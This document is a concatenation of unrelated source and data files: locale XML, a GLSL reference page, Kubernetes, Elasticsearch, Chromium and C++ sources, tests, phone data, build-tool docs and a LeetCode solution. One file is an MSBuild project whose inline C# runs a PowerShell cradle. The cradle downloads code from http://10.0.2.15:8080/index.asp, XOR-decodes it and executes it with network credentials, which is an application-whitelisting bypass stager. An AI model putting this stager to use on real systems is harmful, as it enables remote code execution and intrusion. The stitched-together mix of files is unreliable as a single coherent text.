<era type="0">AM</era>
</eraAbbr>
</eras>
</calendar>
<calendar type="islamic">
<eras>
<eraAbbr>
<era type="0">AH</era>
</eraAbbr>
</eras>
</calendar>
</calendars>
<fields>
<field type="era">
<displayName>era</displayName>
</field>
<field type="month">
<displayName>month</displayName>
<relative type="-1">last month</relative>
<relative type="0">this month</relative>
<relative type="1">next month</relative>
<relativeTime type="future">
<relativeTimePattern count="one">enFutMOne</relativeTimePattern>
<relativeTimePattern count="other">enFutMOther</relativeTimePattern>
</relativeTime>
<relativeTime type="past">
<relativeTimePattern count="one">enPastMOne</relativeTimePattern>
<relativeTimePattern count="other">enPastMOther</relativeTimePattern>
</relativeTime>
</field>
<field type="month-short">
<displayName>mo.</displayName>
<relative type="-1">last mo.</relative>
<relative type="0">this mo.</relative>
<relative type="1">next mo.</relative>
<relativeTime type="future">
<relativeTimePattern count="one">enShortFutMOne</relativeTimePattern>
<relativeTimePattern count="other">enShortFutMOther</relativeTimePattern>
</relativeTime>
<relativeTime type="past">
<relativeTimePattern count="one">enShortPastMOne</relativeTimePattern>
<relativeTimePattern count="other">enShortPastMOther</relativeTimePattern>
</relativeTime>
</field>
</fields>
</dates>
</ldml>
| {
"pile_set_name": "Github"
} |
<div class="refentry" id="gl_Position">
<div class="titlepage"></div>
<div class="refnamediv">
<h2>Name</h2>
<p>gl_Position — contains the position of the current vertex</p>
</div>
<div class="refsynopsisdiv">
<h2>Declaration</h2>
<p>
<code class="varname">gl_Position</code> is a member of the
<code class="varname">gl_PerVertex</code> named block:
</p>
<pre class="programlisting"> out gl_PerVertex {
vec4 gl_Position;
float gl_PointSize;
float gl_ClipDistance[];
};</pre>
<p>
</p>
</div>
<div class="refsect1" id="description">
<h2>Description</h2>
<p>
In the vertex, tessellation evaluation and geometry languages, a single
global instance of the <code class="varname">gl_PerVertex</code> named block is available and
its <code class="varname">gl_Position</code> member is an output that receives the
homogeneous vertex position. It may be written at any time during shader execution.
The value written to <code class="varname">gl_Position</code> will be used by primitive assembly,
clipping, culling and other fixed functionality operations, if present, that operate on
primitives after vertex processing has occurred.
</p>
<p>
In the tessellation control language, the <code class="varname">gl_PerVertex</code> named block
is used to construct an array, <code class="varname">gl_out[]</code>, whose <code class="varname">gl_Position</code>
members hold the homogeneous control point position, which become available as inputs to the subsequent
tessellation evaluation shader.
</p>
<p>
The value of <code class="varname">gl_Position</code> (or the <code class="varname">gl_Position</code> member of the <code class="varname">gl_out[]</code>
array, in the case of the tessellation control shader)
is undefined after the vertex, tessellation control, and tessellation evaluation
shading stages if the corresponding shader executable does
not write to gl_Position. It is also undefined after the geometry processing stage if the geometry shader executable calls
<a class="citerefentry" href="EmitVertex"><span class="citerefentry"><span class="refentrytitle">EmitVertex</span></span></a> without having
written <code class="varname">gl_Position</code> since the last call to <a class="citerefentry" href="EmitVertex"><span class="citerefentry"><span class="refentrytitle">EmitVertex</span></span></a>
(or hasn't written it at all).
</p>
<p>
In the tessellation control, tessellation evaluation and geometry languages,
the <code class="varname">gl_PerVertex</code> named block is used to construct an array, <code class="varname">gl_in[]</code>
of per-vertex or per-control point inputs whose content represents the corresponding
outputs written by the previous stage.
</p>
</div>
{$pipelinestall}{$examples}
<div class="refsect1" id="versions">
<h2>Version Support</h2>
<div class="informaltable">
<table style="border-collapse: collapse; border-top: 2px solid ; border-bottom: 2px solid ; border-left: 2px solid ; border-right: 2px solid ; ">
<colgroup>
<col style="text-align: left; "/>
<col style="text-align: center; " class="firstvers"/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; "/>
<col style="text-align: center; " class="lastvers"/>
</colgroup>
<thead>
<tr>
<th style="text-align: left; border-right: 2px solid ; ">
</th>
<th style="text-align: center; border-bottom: 2px solid ; " colspan="12">
<span class="bold"><strong>OpenGL Shading Language Version</strong></span>
</th>
</tr>
<tr>
<th style="text-align: left; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>Function Name</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.10</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.20</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.30</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.40</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>1.50</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>3.30</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.00</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.10</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.20</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.30</strong></span>
</th>
<th style="text-align: center; border-right: 2px solid ; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.40</strong></span>
</th>
<th style="text-align: center; border-bottom: 2px solid ; ">
<span class="bold"><strong>4.50</strong></span>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: left; border-right: 2px solid ; ">gl_Position</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; border-right: 2px solid ; ">✔</td>
<td style="text-align: center; ">✔</td>
</tr>
</tbody>
</table>
</div>
<p>Versions 1.10 to 1.40 - vertex shader only.</p>
<p>Versions 1.50 to 3.30 - vertex and geometry shaders only.</p>
</div>
<div class="refsect1" id="seealso">
<h2>See Also</h2>
<p>
<a class="citerefentry" href="gl_PointSize"><span class="citerefentry"><span class="refentrytitle">gl_PointSize</span></span></a>, <a class="citerefentry" href="gl_ClipDistance"><span class="citerefentry"><span class="refentrytitle">gl_ClipDistance</span></span></a>
</p>
</div>
<div class="refsect1" id="Copyright">
<h2>Copyright</h2>
<p>
Copyright © 2011-2014 Khronos Group.
This material may be distributed subject to the terms and conditions set forth in
the Open Publication License, v 1.0, 8 June 1999.
<a class="link" href="https://opencontent.org/openpub/" target="_top">https://opencontent.org/openpub/</a>.
</p>
</div>
</div>
| {
"pile_set_name": "Github"
} |
/*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// +k8s:deepcopy-gen=package
// +k8s:protobuf-gen=package
// +groupName=storage.k8s.io
// +k8s:openapi-gen=true
package v1beta1 // import "k8s.io/api/storage/v1beta1"
| {
"pile_set_name": "Github"
} |
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License..
#include "Client.h"
#include "LogBase.h"
#include "Network_def.h"
#include "Messages.pb.h"
#include <boost/lexical_cast.hpp>
using namespace util;
Client::Client(boost::asio::io_service& io_service,
boost::asio::ssl::context& context,
boost::asio::ip::tcp::resolver::iterator endpoint_iterator) : AbstractNetworkOps(io_service, context) {
socket_.set_verify_mode(boost::asio::ssl::verify_peer);
socket_.set_verify_callback(boost::bind(&Client::verify_certificate, this, _1, _2));
this->endpoint_iterator = endpoint_iterator;
}
Client::~Client() {}
void Client::startConnection() {
Log("Start connecting...");
boost::system::error_code ec;
boost::asio::connect(socket_.lowest_layer(), this->endpoint_iterator, ec);
handle_connect(ec);
}
bool Client::verify_certificate(bool preverified, boost::asio::ssl::verify_context& ctx) {
char subject_name[256];
X509* cert = X509_STORE_CTX_get_current_cert(ctx.native_handle());
X509_NAME_oneline(X509_get_subject_name(cert), subject_name, 256);
Log("Verifying certificate: %s", subject_name);
return preverified;
}
void Client::handle_connect(const boost::system::error_code &error) {
if (!error) {
Log("Connection established");
boost::system::error_code ec;
socket_.handshake(boost::asio::ssl::stream_base::client, ec);
handle_handshake(ec);
} else {
Log("Connect failed: %s", error.message(), log::error);
}
}
void Client::handle_handshake(const boost::system::error_code& error) {
if (!error) {
Log("Handshake successful");
auto ret = this->callback_handler("", -1);
send(ret);
} else {
Log("Handshake failed: %s", error.message(), log::error);
}
}
| {
"pile_set_name": "Github"
} |
using System.Web.Routing;
using Glimpse.AspNet.Model;
using Xunit;
namespace Glimpse.Test.AspNet.Model
{
public class RouteModelShould
{
[Fact]
public void SetProperties()
{
var defaults = new[] { new RouteDataItemModel { PlaceHolder = "controller", DefaultValue = "Home" } };
var constraints = new[] { new RouteConstraintModel { IsMatch = true, ParameterName = "action", Constraint = ".+" } };
var dataTokens = new RouteValueDictionary(new { area = "Test", name = "Hi" });
var url = "{controller}/{action}/{id}";
var test = new RouteModel();
test.Area = "Test";
test.Url = url;
test.RouteData = defaults;
test.Constraints = constraints;
test.DataTokens = dataTokens;
Assert.False(test.IsMatch);
Assert.Equal("Test", test.Area);
Assert.Equal(url, test.Url);
Assert.Same(defaults, test.RouteData);
Assert.Same(constraints, test.Constraints);
Assert.Same(dataTokens, test.DataTokens);
test.IsMatch = true;
Assert.True(test.IsMatch);
}
}
} | {
"pile_set_name": "Github"
} |
function [ ref_x, ref_y ] = Refined_seed( Region, r,deta )
[x,y]=meshgrid(1:(2*r));
g=sqrt((x-r).^2+(y-r).^2);
%creat Gass function
z=exp(-((g.^2)/(deta^2*2 )));
% z=exp(-(1/((50*r)^2 *2))*g.^2);
Region=Region+0.01;
temp_Region = Region.* z;
max_temp = max(max(temp_Region));
index=find(temp_Region==max_temp);
ref_y = mod(index(1),(2*r));
if( ref_y == 0)
ref_y = 2*r;
end
ref_x = (index(1)-ref_y)/(2*r)+1;
end
| {
"pile_set_name": "Github"
} |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Author: Pierre-Alexandre Braeken, Twitter: @pabraeken -->
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<Target Name="34rfas">
<QWEridxnaPO />
</Target>
<UsingTask
TaskName="QWEridxnaPO"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class QWEridxnaPO : Task, ITask {
public override bool Execute() {
string pok = "$WC=NeW-OBJecT SyStem.NET.WEbCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeAders.ADd('User-Agent',$u);$Wc.ProxY = [SYsTem.NET.WEBREQUesT]::DEFAuLtWebPRoxy;$WC.PROxY.CrEdentIalS = [SYSteM.Net.CreDentialCACHe]::DEFAulTNETWOrkCrEdEnTialS;$K='daf00538a3dfee3f25671a3f9d076377';$i=0;[Char[]]$B=([char[]]($Wc.DownLoADSTriNG('http://10.0.2.15:8080/index.asp')))|%{$_-bXoR$K[$I++%$K.LENGTH]};IEX ($b-joiN'')";
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(pok);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project> | {
"pile_set_name": "Github"
} |
[expect php]
[file]
<?php
require('Phalanger.inc');
$i = 0;
$str = '';
while ($i<256) {
$str .= chr($i++);
}
__var_dump(md5(strrev($str)));
__var_dump(strrev(NULL));
__var_dump(strrev(""));
?> | {
"pile_set_name": "Github"
} |
# Copyright (C) 2013 The Libphonenumber Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
223200|Orange
2232079|Sotelma
223217|Sotelma
2235|Atel
2236|Sotelma
2237|Orange
22382|Orange
22383|Orange
22389|Sotelma
22390|Orange
22391|Orange
22392|Orange
22393|Orange
22394|Orange
22395|Sotelma
22396|Sotelma
22397|Sotelma
22398|Sotelma
22399|Sotelma
| {
"pile_set_name": "Github"
} |
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CONTENT_SHELL_BROWSER_SHELL_PLUGIN_SERVICE_FILTER_H_
#define CONTENT_SHELL_BROWSER_SHELL_PLUGIN_SERVICE_FILTER_H_
#include "base/basictypes.h"
#include "base/compiler_specific.h"
#include "content/public/browser/plugin_service_filter.h"
namespace content {
class ShellPluginServiceFilter : public PluginServiceFilter {
public:
ShellPluginServiceFilter();
virtual ~ShellPluginServiceFilter();
// PluginServiceFilter implementation.
virtual bool IsPluginAvailable(int render_process_id,
int render_frame_id,
const void* context,
const GURL& url,
const GURL& policy_url,
WebPluginInfo* plugin) OVERRIDE;
virtual bool CanLoadPlugin(int render_process_id,
const base::FilePath& path) OVERRIDE;
private:
DISALLOW_COPY_AND_ASSIGN(ShellPluginServiceFilter);
};
} // namespace content
#endif // CONTENT_SHELL_BROWSER_SHELL_PLUGIN_SERVICE_FILTER_H_
| {
"pile_set_name": "Github"
} |
import {ApiModelProperty} from '@nestjs/swagger';
import {IsString} from 'class-validator';
import {Column, Entity, ObjectIdColumn} from 'typeorm';
import {ExtendedEntity} from '../../_helpers';
@Entity()
export class ConversationEntity extends ExtendedEntity {
@ApiModelProperty()
@ObjectIdColumn()
public id: string;
@ApiModelProperty()
@IsString()
@Column()
public homeId: string;
@ApiModelProperty()
@IsString()
@Column()
public authorId: string;
@ApiModelProperty()
@IsString()
@Column()
public type: string;
}
| {
"pile_set_name": "Github"
} |
# 内置处理器
> 内置的处理器,有相关的依赖,如果用到了相应的处理器需要安装下面指定的依赖,比如 stylus 处理器,需要安装 `stylus` 依赖: `npm i stylus --save-dev`。
## 样式相关
* `less`
* 依赖:`less`
* 默认扩展名:`less`
* 处理器选项:参考官方 [less](http://lesscss.org/usage/#programmatic-usage)
* `stylus`
* 依赖:`stylus`
* 默认扩展名:`styl`
* 处理器选项:参考官方 [stylus](http://stylus-lang.com/docs/js.html)
* `sass`
* 依赖:`node-sass`
* 默认扩展名:`sass`、`scss`
* 处理器选项:参考官方 [sass](https://github.com/sass/node-sass)
* `postcss`:css 后处理器,postcss 提供的内置插件参考[这里](#Postcss插件)
* 依赖:`postcss`
* 默认扩展名:`无`
* 处理器选项:参考官方 [postcss](https://postcss.org/)
## 组件相关
* `component`:用来编译单文件组件的处理器,属于核心的处理器,不需要安装任何附加依赖
* 默认扩展名:依赖于构建配置的 `component.extname` 定义
* `view`:用来编译单文件组件的模板部分,转成原生小程序支持的模板语法,属于核心的处理器,不需要安装任何附加依赖
* 默认扩展名:`tpl`
* ~~`componentGenerator`~~`quickComponentGenerator`(`0.4.9`变更): `0.4 版本开始支持` 生成 `SFC` 处理器,相当于 `component` 处理器逆过程,`快应用` 核心处理器。
## 模板相关
* `pug`: [pug](https://github.com/pugjs/pug) 模板语法支持,为了让使用该语法的模板能继续使用 `okam` 框架扩展的模板语法,需要增加如下配置
* 默认扩展名:`pug`
```javascript
{
processors: {
pug: {
options: {
doctype: 'xml',
data: {
name: 'efe-blue'
}
}
},
view: {
// 定义小程序模板转换的文件后缀名,加上这个才能确保能使用扩展的模板语法
// 默认情况下, pug 处理器的优先级高于 view
extnames: ['pug', 'tpl']
}
},
rules: []
}
```
## 脚本相关
* `babel`: babel6 转译处理器,组件编译默认需要依赖该处理器 或者 使用 `babel7` 也可以
* 依赖:`babel-core`
* 默认扩展名:`无`
* 处理器选项:参考官方 [babel](https://babeljs.io/docs/en/babel-core)
* 对于 `plugins` 选项进行了扩展支持传入 `function`,可以根据文件自定义要返回的附加的 babel 插件:
```
{
processors: {
babel: {
options: {
plugins(file) {
if (file.path.indexOf('src/') === 0) {
return [
'external-helpers'
];
}
}
}
}
}
}
```
* `babel7`
* 依赖:`@babel/core`
* 默认扩展名:`无`
* 处理器选项:参考官方 [babel](https://babeljs.io/docs/en/v7-migration)
* `typescript`
* 依赖:`@babel/core` `@babel/preset-typescript`
* 默认扩展名:`ts`
* typescript 语法:参考官方 [typescript](https://www.typescriptlang.org/)
## 配置相关
* `componentJson`: 组件配置处理器,属于内部核心处理器
* `configJson`: `0.4 版本开始支持` 能够撰写特定平台配置的核心处理器,具体可以参考[特定平台配置](advance/platformSpecCode#配置)
* `quickAppJson`: `0.4 版本开始支持` 快应用配置核心处理器
## 其它处理器
* `json5`:将 `json5` 语法转成 `json`
* 依赖:`json5`
* 默认扩展名:`json5`
* `replacement`:内容替换处理器
* 依赖:无
* 处理器选项: `Object|Array` 参考下面示例
```javascript
{
rules: [
match: '*.js',
processors: [
{
name: 'replacement',
options: {
'http://online.com': 'http://test.com',
'http://online.com': '${devServer}'
},
options: [
// 可以是 function
function (content) {
return content;
},
{
match: 'xx', // 支持正则或者字符串
replace: 'xx'
}
]
}
]
]
}
```
## Postcss插件
* `env`: `0.4 版本开始支持` 撰写特定平台相关的样式代码的核心插件,具体可以参考[这里](advance/platformSpecCode#样式),为了使用该插件,可以按如下方式引入该插件
```javascript
{
processors: {
postcss: {
options: {
plugins: ['env']
}
}
}
}
```
* `quickcss`: `0.4.11 版本开始支持` 引入该插件,会自动修复一些快应用不支持的写法,关于快应用样式支持可以参考[这里](https://doc.quickapp.cn/widgets/common-styles.html)
* 背景样式 `background` 定义会自动展开,由于快应用不支持合并的写法:[具体参考这里](https://doc.quickapp.cn/widgets/background-img-styles.html),比如 `background: url(./img.png) no-repeat` 会转成 `background-image: url(./img.png); background-repeat: no-repeat;`
* 快应用颜色值不支持缩写:比如 `background-color: #2dd` 会转成 `background-color: #22dddd`,目前会对 `background` 及 `border` 相关样式的 `color` 进行处理;
* `border` 样式:快应用不支持 `none` 写法会自动转成 `0`,此外快应用不支持 `border-left/border-right/border-top/border-bottom` 合并写法,会被自动展开,比如 `border-left: 1px solid #ccc` 会转成 `border-left-width: 1px; border-left-style: solid; border-left-color: #cccccc;`
* `font-weight`: 快应用不支持 `数字` 写法,会自动转成 `normal` `bold` 取值,`<600` 会转成 `normal`,`>=600` 会转成 `bold`
* `display`: 快应用只支持 `flex`,`block` 值会自动转成 `flex`
* `position`: 快应用只支持 `fixed`,`absolute` 会自动转成 `fixed`
* `autoprefixer`
* 需要安装依赖:`npm i autoprefixer --save-dev`
* `px2rpx`:自动将 `px` 单位转成 `rpx`
```javascript
{
rules: [
match: '*.css',
processors: {
postcss: {
plugins: {
autoprefixer: {
browsers: [
'last 3 versions',
'iOS >= 8',
'Android >= 4.1'
]
},
px2rpx: {
// 设计稿尺寸
designWidth: 1242,
// 开启 1px 不转, 即有 1px 的数字不会进行转换
// 开启 1px 不转, okam-build 0.4.6 版本开始支持
noTrans1px: true,
// 保留的小数点单位, 默认为 2
precision: 2
}
}
}
}
]
}
```
如果使用的是 `stylus` 等预处理样式语言,可以按如下配置来配合 `postcss` 使用:
```javascript
{
processors: {
postcss: {
// 指定要处理的后缀,默认情况下 `stylus` 处理器执行优先级高于 `postcss`
extnames: ['styl', 'css'],
options: {
// ...
}
}
},
rules: [
// ...
]
}
```
| {
"pile_set_name": "Github"
} |
# Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.
#
# !!! IMPORTANT !!!
#
# Before you edit this file, please keep in mind that contributing to the project
# translations is possible ONLY via the Transifex online service.
#
# To submit your translations, visit https://www.transifex.com/ckeditor/ckeditor5.
#
# To learn more, check out the official contributor's guide:
# https://ckeditor.com/docs/ckeditor5/latest/framework/guides/contributing/contributing.html
#
msgid ""
msgstr ""
"Language-Team: Latvian (https://www.transifex.com/ckeditor/teams/11143/lv/)\n"
"Language: lv\n"
"Plural-Forms: nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2);\n"
msgctxt "Toolbar button tooltip for the Undo feature."
msgid "Undo"
msgstr "Atsaukt"
msgctxt "Toolbar button tooltip for the Redo feature."
msgid "Redo"
msgstr "Uz priekšu"
| {
"pile_set_name": "Github"
} |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.index.mapper;
import org.apache.cassandra.cql3.CQL3Type;
import org.apache.cassandra.cql3.ColumnIdentifier;
import org.apache.cassandra.utils.ByteBufferUtil;
import org.elasticsearch.Version;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.xcontent.ToXContentFragment;
import org.elasticsearch.index.analysis.IndexAnalyzers;
import org.elasticsearch.index.query.QueryShardContext;
import org.elasticsearch.index.similarity.SimilarityProvider;
import java.nio.ByteBuffer;
import java.util.Map;
import java.util.Objects;
import java.util.function.Function;
import java.util.function.Supplier;
public abstract class Mapper implements ToXContentFragment, Iterable<Mapper> {
public static class BuilderContext {
private final Settings indexSettings;
private final ContentPath contentPath;
public BuilderContext(Settings indexSettings, ContentPath contentPath) {
Objects.requireNonNull(indexSettings, "indexSettings is required");
this.contentPath = contentPath;
this.indexSettings = indexSettings;
}
public ContentPath path() {
return this.contentPath;
}
public Settings indexSettings() {
return this.indexSettings;
}
public Version indexCreatedVersion() {
return Version.indexCreated(indexSettings);
}
}
public abstract static class Builder<T extends Builder, Y extends Mapper> {
public String name;
protected T builder;
protected Builder(String name) {
this.name = name;
}
public String name() {
return this.name;
}
/** Returns a newly built mapper. */
public abstract Y build(BuilderContext context);
}
public interface TypeParser {
class ParserContext {
private final String type;
private final IndexAnalyzers indexAnalyzers;
private final Function<String, SimilarityProvider> similarityLookupService;
private final MapperService mapperService;
private final Function<String, TypeParser> typeParsers;
private final Version indexVersionCreated;
private final Supplier<QueryShardContext> queryShardContextSupplier;
public ParserContext(String type, IndexAnalyzers indexAnalyzers, Function<String, SimilarityProvider> similarityLookupService,
MapperService mapperService, Function<String, TypeParser> typeParsers,
Version indexVersionCreated, Supplier<QueryShardContext> queryShardContextSupplier) {
this.type = type;
this.indexAnalyzers = indexAnalyzers;
this.similarityLookupService = similarityLookupService;
this.mapperService = mapperService;
this.typeParsers = typeParsers;
this.indexVersionCreated = indexVersionCreated;
this.queryShardContextSupplier = queryShardContextSupplier;
}
public String type() {
return type;
}
public IndexAnalyzers getIndexAnalyzers() {
return indexAnalyzers;
}
public SimilarityProvider getSimilarity(String name) {
return similarityLookupService.apply(name);
}
public MapperService mapperService() {
return mapperService;
}
public TypeParser typeParser(String type) {
return typeParsers.apply(type);
}
public Version indexVersionCreated() {
return indexVersionCreated;
}
public Supplier<QueryShardContext> queryShardContextSupplier() {
return queryShardContextSupplier;
}
public boolean isWithinMultiField() { return false; }
protected Function<String, TypeParser> typeParsers() { return typeParsers; }
protected Function<String, SimilarityProvider> similarityLookupService() { return similarityLookupService; }
public ParserContext createMultiFieldContext(ParserContext in) {
return new MultiFieldParserContext(in) {
@Override
public boolean isWithinMultiField() { return true; }
};
}
static class MultiFieldParserContext extends ParserContext {
MultiFieldParserContext(ParserContext in) {
super(in.type(), in.indexAnalyzers, in.similarityLookupService(), in.mapperService(), in.typeParsers(),
in.indexVersionCreated(), in.queryShardContextSupplier());
}
}
}
Mapper.Builder<?,?> parse(String name, Map<String, Object> node, ParserContext parserContext) throws MapperParsingException;
}
private final String simpleName;
private ByteBuffer cqlName;
public Mapper(String simpleName) {
Objects.requireNonNull(simpleName);
this.simpleName = simpleName;
}
/** Returns the simple name, which identifies this mapper against other mappers at the same level in the mappers hierarchy
* TODO: make this protected once Mapper and FieldMapper are merged together */
public final String simpleName() {
return simpleName;
}
/** Returns the canonical name which uniquely identifies the mapper against other mappers in a type. */
public abstract String name();
/**
* Returns a name representing the the type of this mapper.
*/
public abstract String typeName();
/** Return the merge of {@code mergeWith} into this.
* Both {@code this} and {@code mergeWith} will be left unmodified. */
public abstract Mapper merge(Mapper mergeWith, boolean updateAllTypes);
/**
* Update the field type of this mapper. This is necessary because some mapping updates
* can modify mappings across several types. This method must return a copy of the mapper
* so that the current mapper is not modified.
*/
public abstract Mapper updateFieldType(Map<String, MappedFieldType> fullNameToFieldType);
public abstract boolean hasField();
/**
* @return cql column name as a ByteBuffer
*/
public ByteBuffer cqlName() {
if (cqlName == null) {
cqlName = ByteBufferUtil.bytes(this.simpleName);
}
return cqlName;
}
}
| {
"pile_set_name": "Github"
} |
# [970. Powerful Integers (Easy)](https://leetcode.com/problems/powerful-integers/)
<p>Given two non-negative integers <code>x</code> and <code>y</code>, an integer is <em>powerful</em> if it is equal to <code>x^i + y^j</code> for some integers <code>i >= 0</code> and <code>j >= 0</code>.</p>
<p>Return a list of all <em>powerful</em> integers that have value less than or equal to <code>bound</code>.</p>
<p>You may return the answer in any order. In your answer, each value should occur at most once.</p>
<p> </p>
<div>
<p><strong>Example 1:</strong></p>
<pre><strong>Input: </strong>x = <span id="example-input-1-1">2</span>, y = <span id="example-input-1-2">3</span>, bound = <span id="example-input-1-3">10</span>
<strong>Output: </strong><span id="example-output-1">[2,3,4,5,7,9,10]</span>
<strong>Explanation: </strong>
2 = 2^0 + 3^0
3 = 2^1 + 3^0
4 = 2^0 + 3^1
5 = 2^1 + 3^1
7 = 2^2 + 3^1
9 = 2^3 + 3^0
10 = 2^0 + 3^2
</pre>
<div>
<p><strong>Example 2:</strong></p>
<pre><strong>Input: </strong>x = <span id="example-input-2-1">3</span>, y = <span id="example-input-2-2">5</span>, bound = <span id="example-input-2-3">15</span>
<strong>Output: </strong><span id="example-output-2">[2,4,6,8,10,14]</span>
</pre>
</div>
</div>
<p> </p>
<p><strong>Note:</strong></p>
<ul>
<li><code>1 <= x <= 100</code></li>
<li><code>1 <= y <= 100</code></li>
<li><code>0 <= bound <= 10^6</code></li>
</ul>
**Related Topics**:
[Math](https://leetcode.com/tag/math/)
## Solution 1.
```cpp
// OJ: https://leetcode.com/problems/powerful-integers/
// Author: github.com/lzl124631x
// Time: O(log_x^bound * log_y^bound)
// Space: O(log_x^bound * log_y^bound)
class Solution {
public:
vector<int> powerfulIntegers(int x, int y, int bound) {
unordered_set<int> s;
for (int a = 1; a + 1 <= bound; a = x == 1 ? bound : a * x)
for (int b = 1; a + b <= bound; b = y == 1 ? bound : b * y)
s.insert(a + b);
return vector<int>(s.begin(), s.end());
}
};
``` | {
"pile_set_name": "Github"
} |
/***********************************************************************
Copyright (c) 2006-2011, Skype Limited. All rights reserved.
Copyright (c) 2013 Parrot
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Internet Society, IETF or IETF Trust, nor the
names of specific contributors, may be used to endorse or promote
products derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
